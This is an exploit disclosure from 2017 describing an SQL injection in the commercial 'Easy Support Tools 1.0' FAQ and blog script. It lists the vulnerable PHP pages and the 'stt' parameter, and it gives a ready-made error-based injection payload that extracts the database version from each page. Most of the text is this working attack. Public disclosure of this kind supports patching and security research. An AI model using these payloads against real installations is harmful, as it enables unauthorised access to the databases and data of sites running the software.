Easy Support Tools 1.0 SQL Injection
Posted on 08 February 2017
# # # # # # Exploit Title: Easy Support Tools - FAQs, Help Articles, Blog and Feedback Script v1.0 - SQL Injection # Google Dork: N/A # Date: 07.02.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Buy: https://codecanyon.net/item/easy-support-tools-faqs-help-articles-blog-and-feedback/17864522 # Demo: http://demos.nelliwinne.net/EasyFAQ/ # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/faq.php?stt=[SQL] # 1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - # http://localhost/[PATH]/support.php?stt=[SQL] # 1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - # http://localhost/[PATH]/blog.php?stt=[SQL] # 1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - # Etc....Other files have vulnerabilities ... # # # # #
